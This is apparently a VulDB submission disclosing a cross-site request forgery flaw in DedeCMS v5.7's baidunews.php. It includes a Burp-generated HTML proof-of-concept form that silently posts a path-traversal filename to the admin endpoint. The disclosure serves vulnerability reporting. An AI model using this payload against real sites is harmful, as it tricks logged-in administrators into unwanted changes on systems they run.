| Title | Github Democms v5.7 CSRF |
|---|
| Description | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/baidunews.php
<html>
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/src/dede/baidunews.php?do=yes" method="POST">
<input type="hidden" name="filename" value="../data/baidunews.xml" />
<input type="hidden" name="button" value="�¼€�§‹�”Ÿ�ˆ" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> |
|---|
| Source | ⚠️ https://github.com/E1CHO/demo/blob/main/26.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submission | 03/14/2024 10:27 (2 years ago) |
|---|
| Moderation | 03/22/2024 11:37 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 257707 [DedeCMS 5.7 /src/dede/baidunews.php filename cross-site request forgery] |
|---|
| Points | 20 |
|---|